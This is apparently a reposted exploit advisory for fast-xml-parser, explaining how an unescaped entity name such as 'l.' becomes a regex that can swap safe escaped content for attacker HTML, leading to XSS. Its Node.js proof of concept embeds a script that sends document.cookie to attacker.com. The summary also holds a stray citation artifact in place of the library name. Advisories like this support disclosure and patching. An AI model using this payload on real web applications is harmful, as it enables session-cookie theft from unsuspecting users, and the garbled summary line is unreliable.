Share
## https://sploitus.com/exploit?id=PACKETSTORM:216220
=============================================================================================================================================
    | # Title     : fast-xml-parser Regex Injection via Malicious XML Entity Name Leading to XSS                                                |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://www.npmjs.com/package/fast-xml-parser                                                                               |
    =============================================================================================================================================
    
    [+] Summary    :  When processEntities is Enabled  A security issue can arise in applications using the :contentReference[oaicite:0]{index=0} library when the processEntities option is enabled and untrusted XML input is accepted.
                      An attacker can define a malicious XML entity with a specially crafted name containing regex metacharacters (e.g., a dot .). 
                      During entity processing, the library internally builds a regular expression using the entity name without properly escaping regex characters.
    				  
    [+] Afected at >= 4.1.3, < 5.3.5 
    
    [+] For example : <!ENTITY l. "<script>alert('XSS');</script>">
    
    This may lead to the creation of a regex similar to : /&l.;/g
    
    Because the dot . in regex matches any single character, this pattern can unintentionally match safe escaped entities such as <. As a result, legitimate escaped HTML content may be replaced with attacker-controlled payloads.
    
    If the parsed output is later rendered in a web application using unsafe sinks such as innerHTML, this can lead to Cross-Site Scripting (XSS).
    
    [+] POC   :  
    
    const { XMLParser } = require("fast-xml-parser");
    
    const attackerXml = `
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE exploit [
      <!ENTITY l. "<script>alert('XSS Triggered!'); fetch('http://attacker.com/steal?cookie=' + document.cookie);</script>">
    ]>
    <root>
        <description>
            Welcome, this text contains a safe Bold tag: <b>Bold Text</b>
        </description>
    </root>
    `;
    
    const options = {
        processEntities: true 
    };
    
    const parser = new XMLParser(options);
    const result = parser.parse(attackerXml);
    
    console.log("--- Final Output After Parsing ---");
    console.log(result.root.description);
    
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================